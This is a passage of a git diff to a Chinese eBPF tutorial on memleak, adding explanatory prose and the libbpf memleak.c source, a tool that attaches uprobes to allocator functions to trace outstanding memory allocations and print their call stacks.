在具体的实现中,我们使用了ATTACH_UPROBEATTACH_URETPROBE两个宏来附加uprobes和uretprobes(函数返回探测点)。每个宏都需要三个参数:BPF程序的骨架(skel),要监视的函数名,以及要触发的BPF程序的名称。
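这两个宏在 memleak.c 中基于 libbpf 的 bpf_program__attach_uprobe_opts() 实现,带 _CHECKED 后缀的版本还会在挂载失败时报错返回。其核心逻辑节选如下(略有简化):

#define __ATTACH_UPROBE(skel, sym_name, prog_name, is_retprobe)           \
    do {                                                                  \
        LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts,                         \
                    .func_name = #sym_name,                               \
                    .retprobe = is_retprobe);                             \
        skel->links.prog_name = bpf_program__attach_uprobe_opts(          \
            skel->progs.prog_name, env.pid, env.object, 0, &uprobe_opts); \
    } while (false)

#define ATTACH_UPROBE(skel, sym_name, prog_name)    __ATTACH_UPROBE(skel, sym_name, prog_name, false)
#define ATTACH_URETPROBE(skel, sym_name, prog_name) __ATTACH_UPROBE(skel, sym_name, prog_name, true)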

+

这些挂载点包括常见的内存分配函数,如malloc、calloc、realloc、mmap、posix_memalign、memalign、free等,以及对应的退出点。另外,我们也观察一些可能的分配函数,如valloc、pvalloc、aligned_alloc等,尽管它们可能不总是存在。

+

这些挂载点的目标是捕获所有可能的内存分配和释放事件,从而使我们的内存泄露检测工具能够获取到尽可能全面的数据。这种方法可以让我们不仅能跟踪到内存分配和释放,还能得到它们发生的上下文信息,例如调用栈和调用次数,从而帮助我们定位和修复内存泄露问题。

+

注意,一些内存分配函数可能并不存在或已弃用,比如valloc、pvalloc等,因此它们的附加可能会失败。在这种情况下,我们允许附加失败,并不会阻止程序的执行。这是因为我们更关注的是主流和常用的内存分配函数,而这些已经被弃用的函数往往在实际应用中较少使用。

+

完整的源代码:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/16-memleak

编译运行

$ git clone https://github.com/iovisor/bcc.git --recurse-submodules 
 $ cd libbpf-tools/
@@ -371,8 +533,9 @@ Tracing outstanding memory allocs...  Hit Ctrl-C to end
 ...
 

总结

-

memleak是一个内存泄漏监控工具,可以用来跟踪内存分配和释放时间对应的调用栈信息。随着时间的推移,这个工具可以显示长期不被释放的内存。

-

这份代码来自于https://github.com/iovisor/bcc/blob/master/libbpf-tools/memleak.bpf.c

+

通过本篇 eBPF 入门实践教程,您已经学习了如何编写 Memleak eBPF 监控程序,以实时监控程序的内存泄漏。您已经了解了 eBPF 在内存监控方面的应用,学会了使用 BPF API 编写 eBPF 程序,创建和使用 eBPF maps,并且明白了如何用 eBPF 工具监测和分析内存泄漏问题。我们展示了一个详细的例子,帮助您理解 eBPF 代码的运行流程和原理。

+

您可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

+

接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。希望这些知识和技巧能帮助您更好地了解和使用 eBPF,以解决实际工作中遇到的问题。

diff --git a/16-memleak/maps.bpf.h b/16-memleak/maps.bpf.h new file mode 100644 index 0000000..51d1012 --- /dev/null +++ b/16-memleak/maps.bpf.h @@ -0,0 +1,26 @@ +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +// Copyright (c) 2020 Anton Protopopov +#ifndef __MAPS_BPF_H +#define __MAPS_BPF_H + +#include +#include + +static __always_inline void * +bpf_map_lookup_or_try_init(void *map, const void *key, const void *init) +{ + void *val; + long err; + + val = bpf_map_lookup_elem(map, key); + if (val) + return val; + + err = bpf_map_update_elem(map, key, init, BPF_NOEXIST); + if (err && err != -EEXIST) + return 0; + + return bpf_map_lookup_elem(map, key); +} + +#endif /* __MAPS_BPF_H */ diff --git a/16-memleak/memleak.bpf.c b/16-memleak/memleak.bpf.c index ac35a55..aa213c8 100644 --- a/16-memleak/memleak.bpf.c +++ b/16-memleak/memleak.bpf.c @@ -337,7 +337,7 @@ int memleak__kfree(void *ctx) ptr = BPF_CORE_READ(args, ptr); } - return gen_free_enter((void *)ptr); + return gen_free_enter(ptr); } SEC("tracepoint/kmem/kmem_cache_alloc") @@ -375,7 +375,7 @@ int memleak__kmem_cache_free(void *ctx) ptr = BPF_CORE_READ(args, ptr); } - return gen_free_enter((void *)ptr); + return gen_free_enter(ptr); } SEC("tracepoint/kmem/mm_page_alloc") diff --git a/16-memleak/memleak.c b/16-memleak/memleak.c new file mode 100644 index 0000000..b106ebc --- /dev/null +++ b/16-memleak/memleak.c @@ -0,0 +1,1067 @@ +// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +// Copyright (c) 2023 Meta Platforms, Inc. and affiliates. +// +// Based on memleak(8) from BCC by Sasha Goldshtein and others. +// 1-Mar-2023 JP Kobryn Created this. +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#include "memleak.h" +#include "memleak.skel.h" +#include "trace_helpers.h" + +#ifdef USE_BLAZESYM +#include "blazesym.h" +#endif + +static struct env { + int interval; + int nr_intervals; + pid_t pid; + bool trace_all; + bool show_allocs; + bool combined_only; + int min_age_ns; + uint64_t sample_rate; + int top_stacks; + size_t min_size; + size_t max_size; + char object[32]; + + bool wa_missing_free; + bool percpu; + int perf_max_stack_depth; + int stack_map_max_entries; + long page_size; + bool kernel_trace; + bool verbose; + char command[32]; +} env = { + .interval = 5, // posarg 1 + .nr_intervals = -1, // posarg 2 + .pid = -1, // -p --pid + .trace_all = false, // -t --trace + .show_allocs = false, // -a --show-allocs + .combined_only = false, // --combined-only + .min_age_ns = 500, // -o --older (arg * 1e6) + .wa_missing_free = false, // --wa-missing-free + .sample_rate = 1, // -s --sample-rate + .top_stacks = 10, // -T --top + .min_size = 0, // -z --min-size + .max_size = -1, // -Z --max-size + .object = {0}, // -O --obj + .percpu = false, // --percpu + .perf_max_stack_depth = 127, + .stack_map_max_entries = 10240, + .page_size = 1, + .kernel_trace = true, + .verbose = false, + .command = {0}, // -c --command +}; + +struct allocation_node { + uint64_t address; + size_t size; + struct allocation_node* next; +}; + +struct allocation { + uint64_t stack_id; + size_t size; + size_t count; + struct allocation_node* allocations; +}; + +#define __ATTACH_UPROBE(skel, sym_name, prog_name, is_retprobe) \ + do { \ + LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts, \ + .func_name = #sym_name, \ + .retprobe = is_retprobe); \ + skel->links.prog_name = bpf_program__attach_uprobe_opts( \ + skel->progs.prog_name, \ + env.pid, \ + env.object, \ + 0, \ + 
&uprobe_opts); \ + } while (false) + +#define __CHECK_PROGRAM(skel, prog_name) \ + do { \ + if (!skel->links.prog_name) { \ + perror("no program attached for " #prog_name); \ + return -errno; \ + } \ + } while (false) + +#define __ATTACH_UPROBE_CHECKED(skel, sym_name, prog_name, is_retprobe) \ + do { \ + __ATTACH_UPROBE(skel, sym_name, prog_name, is_retprobe); \ + __CHECK_PROGRAM(skel, prog_name); \ + } while (false) + +#define ATTACH_UPROBE(skel, sym_name, prog_name) __ATTACH_UPROBE(skel, sym_name, prog_name, false) +#define ATTACH_URETPROBE(skel, sym_name, prog_name) __ATTACH_UPROBE(skel, sym_name, prog_name, true) + +#define ATTACH_UPROBE_CHECKED(skel, sym_name, prog_name) __ATTACH_UPROBE_CHECKED(skel, sym_name, prog_name, false) +#define ATTACH_URETPROBE_CHECKED(skel, sym_name, prog_name) __ATTACH_UPROBE_CHECKED(skel, sym_name, prog_name, true) + +static void sig_handler(int signo); + +static long argp_parse_long(int key, const char *arg, struct argp_state *state); +static error_t argp_parse_arg(int key, char *arg, struct argp_state *state); + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args); + +static int event_init(int *fd); +static int event_wait(int fd, uint64_t expected_event); +static int event_notify(int fd, uint64_t event); + +static pid_t fork_sync_exec(const char *command, int fd); + +#ifdef USE_BLAZESYM +static void print_stack_frame_by_blazesym(size_t frame, uint64_t addr, const blazesym_csym *sym); +static void print_stack_frames_by_blazesym(); +#else +static void print_stack_frames_by_ksyms(); +static void print_stack_frames_by_syms_cache(); +#endif +static int print_stack_frames(struct allocation *allocs, size_t nr_allocs, int stack_traces_fd); + +static int alloc_size_compare(const void *a, const void *b); + +static int print_outstanding_allocs(int allocs_fd, int stack_traces_fd); +static int print_outstanding_combined_allocs(int combined_allocs_fd, int stack_traces_fd); + +static bool has_kernel_node_tracepoints(); +static void disable_kernel_node_tracepoints(struct memleak_bpf *skel); +static void disable_kernel_percpu_tracepoints(struct memleak_bpf *skel); +static void disable_kernel_tracepoints(struct memleak_bpf *skel); + +static int attach_uprobes(struct memleak_bpf *skel); + +const char *argp_program_version = "memleak 0.1"; +const char *argp_program_bug_address = + "https://github.com/iovisor/bcc/tree/master/libbpf-tools"; + +const char argp_args_doc[] = +"Trace outstanding memory allocations\n" +"\n" +"USAGE: memleak [-h] [-c COMMAND] [-p PID] [-t] [-n] [-a] [-o AGE_MS] [-C] [-F] [-s SAMPLE_RATE] [-T TOP_STACKS] [-z MIN_SIZE] [-Z MAX_SIZE] [-O OBJECT] [-P] [INTERVAL] [INTERVALS]\n" +"\n" +"EXAMPLES:\n" +"./memleak -p $(pidof allocs)\n" +" Trace allocations and display a summary of 'leaked' (outstanding)\n" +" allocations every 5 seconds\n" +"./memleak -p $(pidof allocs) -t\n" +" Trace allocations and display each individual allocator function call\n" +"./memleak -ap $(pidof allocs) 10\n" +" Trace allocations and display allocated addresses, sizes, and stacks\n" +" every 10 seconds for outstanding allocations\n" +"./memleak -c './allocs'\n" +" Run the specified command and trace its allocations\n" +"./memleak\n" +" Trace allocations in kernel mode and display a summary of outstanding\n" +" allocations every 5 seconds\n" +"./memleak -o 60000\n" +" Trace allocations in kernel mode and display a summary of outstanding\n" +" allocations that are at least one minute (60 seconds) old\n" +"./memleak -s 5\n" +" Trace roughly 
every 5th allocation, to reduce overhead\n" +""; + +static const struct argp_option argp_options[] = { + // name/longopt:str, key/shortopt:int, arg:str, flags:int, doc:str + {"pid", 'p', "PID", 0, "process ID to trace. if not specified, trace kernel allocs"}, + {"trace", 't', 0, 0, "print trace messages for each alloc/free call" }, + {"show-allocs", 'a', 0, 0, "show allocation addresses and sizes as well as call stacks"}, + {"older", 'o', "AGE_MS", 0, "prune allocations younger than this age in milliseconds"}, + {"command", 'c', "COMMAND", 0, "execute and trace the specified command"}, + {"combined-only", 'C', 0, 0, "show combined allocation statistics only"}, + {"wa-missing-free", 'F', 0, 0, "workaround to alleviate misjudgments when free is missing"}, + {"sample-rate", 's', "SAMPLE_RATE", 0, "sample every N-th allocation to decrease the overhead"}, + {"top", 'T', "TOP_STACKS", 0, "display only this many top allocating stacks (by size)"}, + {"min-size", 'z', "MIN_SIZE", 0, "capture only allocations larger than this size"}, + {"max-size", 'Z', "MAX_SIZE", 0, "capture only allocations smaller than this size"}, + {"obj", 'O', "OBJECT", 0, "attach to allocator functions in the specified object"}, + {"percpu", 'P', NULL, 0, "trace percpu allocations"}, + {}, +}; + +static volatile sig_atomic_t exiting; +static volatile sig_atomic_t child_exited; + +static struct sigaction sig_action = { + .sa_handler = sig_handler +}; + +static int child_exec_event_fd = -1; + +#ifdef USE_BLAZESYM +static blazesym *symbolizer; +static sym_src_cfg src_cfg; +#else +struct syms_cache *syms_cache; +struct ksyms *ksyms; +#endif +static void (*print_stack_frames_func)(); + +static uint64_t *stack; + +static struct allocation *allocs; + +static const char default_object[] = "libc.so.6"; + +int main(int argc, char *argv[]) +{ + int ret = 0; + struct memleak_bpf *skel = NULL; + + static const struct argp argp = { + .options = argp_options, + .parser = argp_parse_arg, + .doc = argp_args_doc, + }; + + // parse command line args to env settings + if (argp_parse(&argp, argc, argv, 0, NULL, NULL)) { + fprintf(stderr, "failed to parse args\n"); + + goto cleanup; + } + + // install signal handler + if (sigaction(SIGINT, &sig_action, NULL) || sigaction(SIGCHLD, &sig_action, NULL)) { + perror("failed to set up signal handling"); + ret = -errno; + + goto cleanup; + } + + // post-processing and validation of env settings + if (env.min_size > env.max_size) { + fprintf(stderr, "min size (-z) can't be greater than max_size (-Z)\n"); + return 1; + } + + if (!strlen(env.object)) { + printf("using default object: %s\n", default_object); + strncpy(env.object, default_object, sizeof(env.object) - 1); + } + + env.page_size = sysconf(_SC_PAGE_SIZE); + printf("using page size: %ld\n", env.page_size); + + env.kernel_trace = env.pid < 0 && !strlen(env.command); + printf("tracing kernel: %s\n", env.kernel_trace ? 
"true" : "false"); + + // if specific userspace program was specified, + // create the child process and use an eventfd to synchronize the call to exec() + if (strlen(env.command)) { + if (env.pid >= 0) { + fprintf(stderr, "cannot specify both command and pid\n"); + ret = 1; + + goto cleanup; + } + + if (event_init(&child_exec_event_fd)) { + fprintf(stderr, "failed to init child event\n"); + + goto cleanup; + } + + const pid_t child_pid = fork_sync_exec(env.command, child_exec_event_fd); + if (child_pid < 0) { + perror("failed to spawn child process"); + ret = -errno; + + goto cleanup; + } + + env.pid = child_pid; + } + + // allocate space for storing a stack trace + stack = calloc(env.perf_max_stack_depth, sizeof(*stack)); + if (!stack) { + fprintf(stderr, "failed to allocate stack array\n"); + ret = -ENOMEM; + + goto cleanup; + } + +#ifdef USE_BLAZESYM + if (env.pid < 0) { + src_cfg.src_type = SRC_T_KERNEL; + src_cfg.params.kernel.kallsyms = NULL; + src_cfg.params.kernel.kernel_image = NULL; + } else { + src_cfg.src_type = SRC_T_PROCESS; + src_cfg.params.process.pid = env.pid; + } +#endif + + // allocate space for storing "allocation" structs + if (env.combined_only) + allocs = calloc(COMBINED_ALLOCS_MAX_ENTRIES, sizeof(*allocs)); + else + allocs = calloc(ALLOCS_MAX_ENTRIES, sizeof(*allocs)); + + if (!allocs) { + fprintf(stderr, "failed to allocate array\n"); + ret = -ENOMEM; + + goto cleanup; + } + + libbpf_set_print(libbpf_print_fn); + + skel = memleak_bpf__open(); + if (!skel) { + fprintf(stderr, "failed to open bpf object\n"); + ret = 1; + + goto cleanup; + } + + skel->rodata->min_size = env.min_size; + skel->rodata->max_size = env.max_size; + skel->rodata->page_size = env.page_size; + skel->rodata->sample_rate = env.sample_rate; + skel->rodata->trace_all = env.trace_all; + skel->rodata->stack_flags = env.kernel_trace ? 
0 : BPF_F_USER_STACK; + skel->rodata->wa_missing_free = env.wa_missing_free; + + bpf_map__set_value_size(skel->maps.stack_traces, + env.perf_max_stack_depth * sizeof(unsigned long)); + bpf_map__set_max_entries(skel->maps.stack_traces, env.stack_map_max_entries); + + // disable kernel tracepoints based on settings or availability + if (env.kernel_trace) { + if (!has_kernel_node_tracepoints()) + disable_kernel_node_tracepoints(skel); + + if (!env.percpu) + disable_kernel_percpu_tracepoints(skel); + } else { + disable_kernel_tracepoints(skel); + } + + ret = memleak_bpf__load(skel); + if (ret) { + fprintf(stderr, "failed to load bpf object\n"); + + goto cleanup; + } + + const int allocs_fd = bpf_map__fd(skel->maps.allocs); + const int combined_allocs_fd = bpf_map__fd(skel->maps.combined_allocs); + const int stack_traces_fd = bpf_map__fd(skel->maps.stack_traces); + + // if userspace oriented, attach upbrobes + if (!env.kernel_trace) { + ret = attach_uprobes(skel); + if (ret) { + fprintf(stderr, "failed to attach uprobes\n"); + + goto cleanup; + } + } + + ret = memleak_bpf__attach(skel); + if (ret) { + fprintf(stderr, "failed to attach bpf program(s)\n"); + + goto cleanup; + } + + // if running a specific userspace program, + // notify the child process that it can exec its program + if (strlen(env.command)) { + ret = event_notify(child_exec_event_fd, 1); + if (ret) { + fprintf(stderr, "failed to notify child to perform exec\n"); + + goto cleanup; + } + } + +#ifdef USE_BLAZESYM + symbolizer = blazesym_new(); + if (!symbolizer) { + fprintf(stderr, "Failed to load blazesym\n"); + ret = -ENOMEM; + + goto cleanup; + } + print_stack_frames_func = print_stack_frames_by_blazesym; +#else + if (env.kernel_trace) { + ksyms = ksyms__load(); + if (!ksyms) { + fprintf(stderr, "Failed to load ksyms\n"); + ret = -ENOMEM; + + goto cleanup; + } + print_stack_frames_func = print_stack_frames_by_ksyms; + } else { + syms_cache = syms_cache__new(0); + if (!syms_cache) { + fprintf(stderr, "Failed to create syms_cache\n"); + ret = -ENOMEM; + + goto cleanup; + } + print_stack_frames_func = print_stack_frames_by_syms_cache; + } +#endif + + printf("Tracing outstanding memory allocs... 
Hit Ctrl-C to end\n"); + + // main loop + while (!exiting && env.nr_intervals) { + env.nr_intervals--; + + sleep(env.interval); + + if (env.combined_only) + print_outstanding_combined_allocs(combined_allocs_fd, stack_traces_fd); + else + print_outstanding_allocs(allocs_fd, stack_traces_fd); + } + + // after loop ends, check for child process and cleanup accordingly + if (env.pid > 0 && strlen(env.command)) { + if (!child_exited) { + if (kill(env.pid, SIGTERM)) { + perror("failed to signal child process"); + ret = -errno; + + goto cleanup; + } + printf("signaled child process\n"); + } + + if (waitpid(env.pid, NULL, 0) < 0) { + perror("failed to reap child process"); + ret = -errno; + + goto cleanup; + } + printf("reaped child process\n"); + } + +cleanup: +#ifdef USE_BLAZESYM + blazesym_free(symbolizer); +#else + if (syms_cache) + syms_cache__free(syms_cache); + if (ksyms) + ksyms__free(ksyms); +#endif + memleak_bpf__destroy(skel); + + free(allocs); + free(stack); + + printf("done\n"); + + return ret; +} + +long argp_parse_long(int key, const char *arg, struct argp_state *state) +{ + errno = 0; + const long temp = strtol(arg, NULL, 10); + if (errno || temp <= 0) { + fprintf(stderr, "error arg:%c %s\n", (char)key, arg); + argp_usage(state); + } + + return temp; +} + +error_t argp_parse_arg(int key, char *arg, struct argp_state *state) +{ + static int pos_args = 0; + + switch (key) { + case 'p': + env.pid = atoi(arg); + break; + case 't': + env.trace_all = true; + break; + case 'a': + env.show_allocs = true; + break; + case 'o': + env.min_age_ns = 1e6 * atoi(arg); + break; + case 'c': + strncpy(env.command, arg, sizeof(env.command) - 1); + break; + case 'C': + env.combined_only = true; + break; + case 'F': + env.wa_missing_free = true; + break; + case 's': + env.sample_rate = argp_parse_long(key, arg, state); + break; + case 'T': + env.top_stacks = atoi(arg); + break; + case 'z': + env.min_size = argp_parse_long(key, arg, state); + break; + case 'Z': + env.max_size = argp_parse_long(key, arg, state); + break; + case 'O': + strncpy(env.object, arg, sizeof(env.object) - 1); + break; + case 'P': + env.percpu = true; + break; + case ARGP_KEY_ARG: + pos_args++; + + if (pos_args == 1) { + env.interval = argp_parse_long(key, arg, state); + } + else if (pos_args == 2) { + env.nr_intervals = argp_parse_long(key, arg, state); + } else { + fprintf(stderr, "Unrecognized positional argument: %s\n", arg); + argp_usage(state); + } + + break; + default: + return ARGP_ERR_UNKNOWN; + } + + return 0; +} + +int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + if (level == LIBBPF_DEBUG && !env.verbose) + return 0; + + return vfprintf(stderr, format, args); +} + +void sig_handler(int signo) +{ + if (signo == SIGCHLD) + child_exited = 1; + + exiting = 1; +} + +int event_init(int *fd) +{ + if (!fd) { + fprintf(stderr, "pointer to fd is null\n"); + + return 1; + } + + const int tmp_fd = eventfd(0, EFD_CLOEXEC); + if (tmp_fd < 0) { + perror("failed to create event fd"); + + return -errno; + } + + *fd = tmp_fd; + + return 0; +} + +int event_wait(int fd, uint64_t expected_event) +{ + uint64_t event = 0; + const ssize_t bytes = read(fd, &event, sizeof(event)); + if (bytes < 0) { + perror("failed to read from fd"); + + return -errno; + } else if (bytes != sizeof(event)) { + fprintf(stderr, "read unexpected size\n"); + + return 1; + } + + if (event != expected_event) { + fprintf(stderr, "read event %lu, expected %lu\n", event, expected_event); + + return 1; + } + + return 0; +} + +int 
event_notify(int fd, uint64_t event) +{ + const ssize_t bytes = write(fd, &event, sizeof(event)); + if (bytes < 0) { + perror("failed to write to fd"); + + return -errno; + } else if (bytes != sizeof(event)) { + fprintf(stderr, "attempted to write %zu bytes, wrote %zd bytes\n", sizeof(event), bytes); + + return 1; + } + + return 0; +} + +pid_t fork_sync_exec(const char *command, int fd) +{ + const pid_t pid = fork(); + + switch (pid) { + case -1: + perror("failed to create child process"); + break; + case 0: { + const uint64_t event = 1; + if (event_wait(fd, event)) { + fprintf(stderr, "failed to wait on event"); + exit(EXIT_FAILURE); + } + + printf("received go event. executing child command\n"); + + const int err = execl(command, command, NULL); + if (err) { + perror("failed to execute child command"); + return -1; + } + + break; + } + default: + printf("child created with pid: %d\n", pid); + + break; + } + + return pid; +} + +#if USE_BLAZESYM +void print_stack_frame_by_blazesym(size_t frame, uint64_t addr, const blazesym_csym *sym) +{ + if (!sym) + printf("\t%zu [<%016lx>] <%s>\n", frame, addr, "null sym"); + else if (sym->path && strlen(sym->path)) + printf("\t%zu [<%016lx>] %s+0x%lx %s:%ld\n", frame, addr, sym->symbol, addr - sym->start_address, sym->path, sym->line_no); + else + printf("\t%zu [<%016lx>] %s+0x%lx\n", frame, addr, sym->symbol, addr - sym->start_address); +} + +void print_stack_frames_by_blazesym() +{ + const blazesym_result *result = blazesym_symbolize(symbolizer, &src_cfg, 1, stack, env.perf_max_stack_depth); + + for (size_t j = 0; j < result->size; ++j) { + const uint64_t addr = stack[j]; + + if (addr == 0) + break; + + // no symbol found + if (!result || j >= result->size || result->entries[j].size == 0) { + print_stack_frame_by_blazesym(j, addr, NULL); + + continue; + } + + // single symbol found + if (result->entries[j].size == 1) { + const blazesym_csym *sym = &result->entries[j].syms[0]; + print_stack_frame_by_blazesym(j, addr, sym); + + continue; + } + + // multi symbol found + printf("\t%zu [<%016lx>] (%lu entries)\n", j, addr, result->entries[j].size); + + for (size_t k = 0; k < result->entries[j].size; ++k) { + const blazesym_csym *sym = &result->entries[j].syms[k]; + if (sym->path && strlen(sym->path)) + printf("\t\t%s@0x%lx %s:%ld\n", sym->symbol, sym->start_address, sym->path, sym->line_no); + else + printf("\t\t%s@0x%lx\n", sym->symbol, sym->start_address); + } + } + + blazesym_result_free(result); +} +#else +void print_stack_frames_by_ksyms() +{ + for (size_t i = 0; i < env.perf_max_stack_depth; ++i) { + const uint64_t addr = stack[i]; + + if (addr == 0) + break; + + const struct ksym *ksym = ksyms__map_addr(ksyms, addr); + if (ksym) + printf("\t%zu [<%016lx>] %s+0x%lx\n", i, addr, ksym->name, addr - ksym->addr); + else + printf("\t%zu [<%016lx>] <%s>\n", i, addr, "null sym"); + } +} + +void print_stack_frames_by_syms_cache() +{ + const struct syms *syms = syms_cache__get_syms(syms_cache, env.pid); + if (!syms) { + fprintf(stderr, "Failed to get syms\n"); + return; + } + + for (size_t i = 0; i < env.perf_max_stack_depth; ++i) { + const uint64_t addr = stack[i]; + + if (addr == 0) + break; + + char *dso_name; + uint64_t dso_offset; + const struct sym *sym = syms__map_addr_dso(syms, addr, &dso_name, &dso_offset); + if (sym) { + printf("\t%zu [<%016lx>] %s+0x%lx", i, addr, sym->name, sym->offset); + if (dso_name) + printf(" [%s]", dso_name); + printf("\n"); + } else { + printf("\t%zu [<%016lx>] <%s>\n", i, addr, "null sym"); + } + } +} +#endif + +int 
print_stack_frames(struct allocation *allocs, size_t nr_allocs, int stack_traces_fd) +{ + for (size_t i = 0; i < nr_allocs; ++i) { + const struct allocation *alloc = &allocs[i]; + + printf("%zu bytes in %zu allocations from stack\n", alloc->size, alloc->count); + + if (env.show_allocs) { + struct allocation_node* it = alloc->allocations; + while (it != NULL) { + printf("\taddr = %#lx size = %zu\n", it->address, it->size); + it = it->next; + } + } + + if (bpf_map_lookup_elem(stack_traces_fd, &alloc->stack_id, stack)) { + if (errno == ENOENT) + continue; + + perror("failed to lookup stack trace"); + + return -errno; + } + + (*print_stack_frames_func)(); + } + + return 0; +} + +int alloc_size_compare(const void *a, const void *b) +{ + const struct allocation *x = (struct allocation *)a; + const struct allocation *y = (struct allocation *)b; + + // descending order + + if (x->size > y->size) + return -1; + + if (x->size < y->size) + return 1; + + return 0; +} + +int print_outstanding_allocs(int allocs_fd, int stack_traces_fd) +{ + time_t t = time(NULL); + struct tm *tm = localtime(&t); + + size_t nr_allocs = 0; + + // for each struct alloc_info "alloc_info" in the bpf map "allocs" + for (uint64_t prev_key = 0, curr_key = 0;; prev_key = curr_key) { + struct alloc_info alloc_info = {}; + memset(&alloc_info, 0, sizeof(alloc_info)); + + if (bpf_map_get_next_key(allocs_fd, &prev_key, &curr_key)) { + if (errno == ENOENT) { + break; // no more keys, done + } + + perror("map get next key error"); + + return -errno; + } + + if (bpf_map_lookup_elem(allocs_fd, &curr_key, &alloc_info)) { + if (errno == ENOENT) + continue; + + perror("map lookup error"); + + return -errno; + } + + // filter by age + if (get_ktime_ns() - env.min_age_ns < alloc_info.timestamp_ns) { + continue; + } + + // filter invalid stacks + if (alloc_info.stack_id < 0) { + continue; + } + + // when the stack_id exists in the allocs array, + // increment size with alloc_info.size + bool stack_exists = false; + + for (size_t i = 0; !stack_exists && i < nr_allocs; ++i) { + struct allocation *alloc = &allocs[i]; + + if (alloc->stack_id == alloc_info.stack_id) { + alloc->size += alloc_info.size; + alloc->count++; + + if (env.show_allocs) { + struct allocation_node* node = malloc(sizeof(struct allocation_node)); + if (!node) { + perror("malloc failed"); + return -errno; + } + node->address = curr_key; + node->size = alloc_info.size; + node->next = alloc->allocations; + alloc->allocations = node; + } + + stack_exists = true; + break; + } + } + + if (stack_exists) + continue; + + // when the stack_id does not exist in the allocs array, + // create a new entry in the array + struct allocation alloc = { + .stack_id = alloc_info.stack_id, + .size = alloc_info.size, + .count = 1, + .allocations = NULL + }; + + if (env.show_allocs) { + struct allocation_node* node = malloc(sizeof(struct allocation_node)); + if (!node) { + perror("malloc failed"); + return -errno; + } + node->address = curr_key; + node->size = alloc_info.size; + node->next = NULL; + alloc.allocations = node; + } + + memcpy(&allocs[nr_allocs], &alloc, sizeof(alloc)); + nr_allocs++; + } + + // sort the allocs array in descending order + qsort(allocs, nr_allocs, sizeof(allocs[0]), alloc_size_compare); + + // get min of allocs we stored vs the top N requested stacks + size_t nr_allocs_to_show = nr_allocs < env.top_stacks ? 
nr_allocs : env.top_stacks; + + printf("[%d:%d:%d] Top %zu stacks with outstanding allocations:\n", + tm->tm_hour, tm->tm_min, tm->tm_sec, nr_allocs_to_show); + + print_stack_frames(allocs, nr_allocs_to_show, stack_traces_fd); + + // Reset allocs list so that we dont accidentaly reuse data the next time we call this function + for (size_t i = 0; i < nr_allocs; i++) { + allocs[i].stack_id = 0; + if (env.show_allocs) { + struct allocation_node *it = allocs[i].allocations; + while (it != NULL) { + struct allocation_node *this = it; + it = it->next; + free(this); + } + allocs[i].allocations = NULL; + } + } + + return 0; +} + +int print_outstanding_combined_allocs(int combined_allocs_fd, int stack_traces_fd) +{ + time_t t = time(NULL); + struct tm *tm = localtime(&t); + + size_t nr_allocs = 0; + + // for each stack_id "curr_key" and union combined_alloc_info "alloc" + // in bpf_map "combined_allocs" + for (uint64_t prev_key = 0, curr_key = 0;; prev_key = curr_key) { + union combined_alloc_info combined_alloc_info; + memset(&combined_alloc_info, 0, sizeof(combined_alloc_info)); + + if (bpf_map_get_next_key(combined_allocs_fd, &prev_key, &curr_key)) { + if (errno == ENOENT) { + break; // no more keys, done + } + + perror("map get next key error"); + + return -errno; + } + + if (bpf_map_lookup_elem(combined_allocs_fd, &curr_key, &combined_alloc_info)) { + if (errno == ENOENT) + continue; + + perror("map lookup error"); + + return -errno; + } + + const struct allocation alloc = { + .stack_id = curr_key, + .size = combined_alloc_info.total_size, + .count = combined_alloc_info.number_of_allocs, + .allocations = NULL + }; + + memcpy(&allocs[nr_allocs], &alloc, sizeof(alloc)); + nr_allocs++; + } + + qsort(allocs, nr_allocs, sizeof(allocs[0]), alloc_size_compare); + + // get min of allocs we stored vs the top N requested stacks + nr_allocs = nr_allocs < env.top_stacks ? 
nr_allocs : env.top_stacks; + + printf("[%d:%d:%d] Top %zu stacks with outstanding allocations:\n", + tm->tm_hour, tm->tm_min, tm->tm_sec, nr_allocs); + + print_stack_frames(allocs, nr_allocs, stack_traces_fd); + + return 0; +} + +bool has_kernel_node_tracepoints() +{ + return tracepoint_exists("kmem", "kmalloc_node") && + tracepoint_exists("kmem", "kmem_cache_alloc_node"); +} + +void disable_kernel_node_tracepoints(struct memleak_bpf *skel) +{ + bpf_program__set_autoload(skel->progs.memleak__kmalloc_node, false); + bpf_program__set_autoload(skel->progs.memleak__kmem_cache_alloc_node, false); +} + +void disable_kernel_percpu_tracepoints(struct memleak_bpf *skel) +{ + bpf_program__set_autoload(skel->progs.memleak__percpu_alloc_percpu, false); + bpf_program__set_autoload(skel->progs.memleak__percpu_free_percpu, false); +} + +void disable_kernel_tracepoints(struct memleak_bpf *skel) +{ + bpf_program__set_autoload(skel->progs.memleak__kmalloc, false); + bpf_program__set_autoload(skel->progs.memleak__kmalloc_node, false); + bpf_program__set_autoload(skel->progs.memleak__kfree, false); + bpf_program__set_autoload(skel->progs.memleak__kmem_cache_alloc, false); + bpf_program__set_autoload(skel->progs.memleak__kmem_cache_alloc_node, false); + bpf_program__set_autoload(skel->progs.memleak__kmem_cache_free, false); + bpf_program__set_autoload(skel->progs.memleak__mm_page_alloc, false); + bpf_program__set_autoload(skel->progs.memleak__mm_page_free, false); + bpf_program__set_autoload(skel->progs.memleak__percpu_alloc_percpu, false); + bpf_program__set_autoload(skel->progs.memleak__percpu_free_percpu, false); +} + +int attach_uprobes(struct memleak_bpf *skel) +{ + ATTACH_UPROBE_CHECKED(skel, malloc, malloc_enter); + ATTACH_URETPROBE_CHECKED(skel, malloc, malloc_exit); + + ATTACH_UPROBE_CHECKED(skel, calloc, calloc_enter); + ATTACH_URETPROBE_CHECKED(skel, calloc, calloc_exit); + + ATTACH_UPROBE_CHECKED(skel, realloc, realloc_enter); + ATTACH_URETPROBE_CHECKED(skel, realloc, realloc_exit); + + ATTACH_UPROBE_CHECKED(skel, mmap, mmap_enter); + ATTACH_URETPROBE_CHECKED(skel, mmap, mmap_exit); + + 